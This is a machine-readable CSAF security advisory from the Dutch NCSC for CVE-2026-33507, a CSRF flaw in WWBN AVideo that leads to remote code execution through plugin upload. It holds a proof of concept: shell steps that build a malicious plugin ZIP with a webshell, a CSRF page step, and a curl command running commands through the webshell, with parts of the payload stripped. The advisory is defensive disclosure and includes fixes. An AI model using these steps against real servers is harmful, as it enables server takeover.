{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33507", "tracking": { "current_release_date": "2026-03-26T00:51:32.412518Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33507", "initial_release_date": "2026-03-20T22:41:56.509677Z", "revision_history": [ { "date": "2026-03-20T22:41:56.509677Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T22:42:04.055468Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T07:05:33.940520Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T07:05:35.581075Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T07:42:06.504727Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1).| Unknown change." }, { "date": "2026-03-24T07:42:09.596581Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:51:46.462468Z", "number": "7", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T20:51:49.888872Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-24T21:37:23.116619Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:28.328120Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-25T21:02:02.402979Z", "number": "11", "summary": "References created (2)." }, { "date": "2026-03-25T21:02:05.846059Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:49:52.592269Z", "number": "13", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)." } ], "status": "interim", "version": "13" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33507", "cwe": { "id": "CWE-352", "name": "Cross-Site Request Forgery (CSRF)" }, "notes": [ { "category": "description", "text": "## Summary\n\nThe `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server.\n\n## Details\n\nThe root cause has two components working together:\n\n**1. SameSite=None on session cookies (`objects/include_config.php:134-137`):**\n\n```php\nif ($isHTTPS) {\n ini_set('session.cookie_samesite', 'None');\n ini_set('session.cookie_secure', '1');\n}\n```\n\nThis explicitly allows browsers to include the session cookie on cross-origin requests to the AVideo instance.\n\n**2. No CSRF protection on pluginImport.json.php (`objects/pluginImport.json.php:18`):**\n\n```php\nif (!User::isAdmin()) {\n $obj->msg = \"You are not admin\";\n die(json_encode($obj));\n}\n```\n\nThe endpoint only checks `User::isAdmin()` via the session. There is:\n- No CSRF token validation (the `verifyToken`/`globalToken` mechanism used elsewhere is absent)\n- No `allowOrigin()` call (contrast with `objects/videoAddNew.json.php` which calls `allowOrigin()` at line 8)\n- No `Referer` or `Origin` header validation\n- No requirement for custom headers (e.g., `X-Requested-With`)\n\nThe upload form at `view/managerPluginUpload.php` also contains no CSRF token — it's a plain `
` with a file input.\n\n**Why the attack bypasses CORS preflight:** `multipart/form-data` is a CORS-safelisted Content-Type, so a `fetch()` call with `mode: 'no-cors'` and `credentials: 'include'` sends the request directly without an OPTIONS preflight. The attacker cannot read the response, but the side effect — plugin installation and PHP file extraction to the web-accessible `plugin/` directory — is the objective.\n\n**Why secondary PHP files are not validated:** The ZIP validation (lines 67-152) thoroughly checks for path traversal, dangerous extensions (`.phtml`, `.phar`, `.sh`, etc.), and verifies the main plugin file extends `PluginAbstract`. However, `.php` is intentionally not in the `dangerousExtensions` list (it's a plugin system), and only the main file (`PluginName/PluginName.php`) is checked for the `PluginAbstract` pattern. Any additional `.php` files in the ZIP are extracted without content inspection.\n\n## PoC\n\n**Step 1: Create the malicious plugin ZIP**\n\n```bash\nmkdir -p EvilPlugin\n# Main file — passes PluginAbstract validation\ncat > EvilPlugin/EvilPlugin.php << 'PLUG'\n EvilPlugin/cmd.php << 'SHELL'\n\nSHELL\n\nzip -r evil-plugin.zip EvilPlugin/\n```\n\n**Step 2: Host the CSRF exploit page**\n\n```html\n\n\n\n

Loading...

\n\n\n\n```\n\n**Step 3: Admin visits attacker's page while logged into AVideo over HTTPS**\n\nThe browser sends the multipart/form-data POST with the admin's `PHPSESSID` cookie (allowed by `SameSite=None`). The server processes the upload, validates the ZIP structure, and extracts it to `plugin/EvilPlugin/`.\n\n**Step 4: Attacker accesses the webshell**\n\n```bash\ncurl 'https://TARGET_AVIDEO_INSTANCE/plugin/EvilPlugin/cmd.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\n- **Remote Code Execution:** An unauthenticated attacker achieves arbitrary OS command execution on the AVideo server by exploiting a logged-in admin's session.\n- **Full server compromise:** The webshell runs as the web server user (`www-data`), enabling data exfiltration, lateral movement, database access, and further privilege escalation.\n- **No attacker account needed:** The attacker requires zero privileges on the target system — only that an admin visits a page they control.\n- **Stealth:** The attack is invisible to the admin (fire-and-forget side-effect request). The `no-cors` mode means no visible error or redirect.\n\n## Recommended Fix\n\n**1. Add CSRF token validation to `objects/pluginImport.json.php`** (primary fix):\n\n```php\n// After the isAdmin() check at line 18, add:\nif (!User::isAdmin()) {\n $obj->msg = \"You are not admin\";\n die(json_encode($obj));\n}\n\n// Add CSRF protection\nallowOrigin();\n\n// Also validate a CSRF token\nif (empty($_POST['globalToken']) || !verifyToken($_POST['globalToken'])) {\n $obj->msg = \"Invalid CSRF token\";\n die(json_encode($obj));\n}\n```\n\n**2. Update the upload form in `view/managerPluginUpload.php`** to include the token:\n\n```html\n\n \">\n \n
\n```\n\nAnd pass it in the JavaScript upload config:\n\n```javascript\n$('#input-b1').fileinput({\n uploadUrl: webSiteRootURL + 'objects/pluginImport.json.php',\n uploadExtraData: { globalToken: $('input[name=globalToken]').val() },\n // ...\n});\n```\n\n**3. Consider changing `SameSite=None` to `SameSite=Lax`** unless cross-origin cookie inclusion is specifically required for application functionality. `Lax` prevents cross-site POST requests from including cookies, which would mitigate this and similar CSRF vectors application-wide.", "title": "github - https://api.github.com/advisories/GHSA-hv36-p4w4-6vmj" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server. Commit d1bc1695edd9ad4468a48cea0df6cd943a2635f3 contains a patch.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33507" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server. Commit d1bc1695edd9ad4468a48cea0df6cd943a2635f3 contains a patch.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33507.json" }, { "category": "description", "text": "## Summary\n\nThe `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server.\n\n## Details\n\nThe root cause has two components working together:\n\n**1. SameSite=None on session cookies (`objects/include_config.php:134-137`):**\n\n```php\nif ($isHTTPS) {\n ini_set('session.cookie_samesite', 'None');\n ini_set('session.cookie_secure', '1');\n}\n```\n\nThis explicitly allows browsers to include the session cookie on cross-origin requests to the AVideo instance.\n\n**2. No CSRF protection on pluginImport.json.php (`objects/pluginImport.json.php:18`):**\n\n```php\nif (!User::isAdmin()) {\n $obj->msg = \"You are not admin\";\n die(json_encode($obj));\n}\n```\n\nThe endpoint only checks `User::isAdmin()` via the session. There is:\n- No CSRF token validation (the `verifyToken`/`globalToken` mechanism used elsewhere is absent)\n- No `allowOrigin()` call (contrast with `objects/videoAddNew.json.php` which calls `allowOrigin()` at line 8)\n- No `Referer` or `Origin` header validation\n- No requirement for custom headers (e.g., `X-Requested-With`)\n\nThe upload form at `view/managerPluginUpload.php` also contains no CSRF token — it's a plain `
` with a file input.\n\n**Why the attack bypasses CORS preflight:** `multipart/form-data` is a CORS-safelisted Content-Type, so a `fetch()` call with `mode: 'no-cors'` and `credentials: 'include'` sends the request directly without an OPTIONS preflight. The attacker cannot read the response, but the side effect — plugin installation and PHP file extraction to the web-accessible `plugin/` directory — is the objective.\n\n**Why secondary PHP files are not validated:** The ZIP validation (lines 67-152) thoroughly checks for path traversal, dangerous extensions (`.phtml`, `.phar`, `.sh`, etc.), and verifies the main plugin file extends `PluginAbstract`. However, `.php` is intentionally not in the `dangerousExtensions` list (it's a plugin system), and only the main file (`PluginName/PluginName.php`) is checked for the `PluginAbstract` pattern. Any additional `.php` files in the ZIP are extracted without content inspection.\n\n## PoC\n\n**Step 1: Create the malicious plugin ZIP**\n\n```bash\nmkdir -p EvilPlugin\n# Main file — passes PluginAbstract validation\ncat > EvilPlugin/EvilPlugin.php << 'PLUG'\n EvilPlugin/cmd.php << 'SHELL'\n\nSHELL\n\nzip -r evil-plugin.zip EvilPlugin/\n```\n\n**Step 2: Host the CSRF exploit page**\n\n```html\n\n\n\n

Loading...

\n\n\n\n```\n\n**Step 3: Admin visits attacker's page while logged into AVideo over HTTPS**\n\nThe browser sends the multipart/form-data POST with the admin's `PHPSESSID` cookie (allowed by `SameSite=None`). The server processes the upload, validates the ZIP structure, and extracts it to `plugin/EvilPlugin/`.\n\n**Step 4: Attacker accesses the webshell**\n\n```bash\ncurl 'https://TARGET_AVIDEO_INSTANCE/plugin/EvilPlugin/cmd.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\n- **Remote Code Execution:** An unauthenticated attacker achieves arbitrary OS command execution on the AVideo server by exploiting a logged-in admin's session.\n- **Full server compromise:** The webshell runs as the web server user (`www-data`), enabling data exfiltration, lateral movement, database access, and further privilege escalation.\n- **No attacker account needed:** The attacker requires zero privileges on the target system — only that an admin visits a page they control.\n- **Stealth:** The attack is invisible to the admin (fire-and-forget side-effect request). The `no-cors` mode means no visible error or redirect.\n\n## Recommended Fix\n\n**1. Add CSRF token validation to `objects/pluginImport.json.php`** (primary fix):\n\n```php\n// After the isAdmin() check at line 18, add:\nif (!User::isAdmin()) {\n $obj->msg = \"You are not admin\";\n die(json_encode($obj));\n}\n\n// Add CSRF protection\nallowOrigin();\n\n// Also validate a CSRF token\nif (empty($_POST['globalToken']) || !verifyToken($_POST['globalToken'])) {\n $obj->msg = \"Invalid CSRF token\";\n die(json_encode($obj));\n}\n```\n\n**2. Update the upload form in `view/managerPluginUpload.php`** to include the token:\n\n```html\n\n \">\n \n
\n```\n\nAnd pass it in the JavaScript upload config:\n\n```javascript\n$('#input-b1').fileinput({\n uploadUrl: webSiteRootURL + 'objects/pluginImport.json.php',\n uploadExtraData: { globalToken: $('input[name=globalToken]').val() },\n // ...\n});\n```\n\n**3. Consider changing `SameSite=None` to `SameSite=Lax`** unless cross-origin cookie inclusion is specifically required for application functionality. `Lax` prevents cross-site POST requests from including cookies, which would mitigate this and similar CSRF vectors application-wide.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-hv36-p4w4-6vmj.json?alt=media" }, { "category": "other", "text": "0.00064", "title": "EPSS" }, { "category": "other", "text": "3.3", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, Is related to CWE-352 (Cross-Site Request Forgery (CSRF)), The value of the most recent EPSS score, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-hv36-p4w4-6vmj" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33507" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33507.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-hv36-p4w4-6vmj.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-hv36-p4w4-6vmj" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-hv36-p4w4-6vmj" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/d1bc1695edd9ad4468a48cea0df6cd943a2635f3" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33507" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929", "CSAFPID-5893889" ] } ], "title": "CVE-2026-33507" } ] }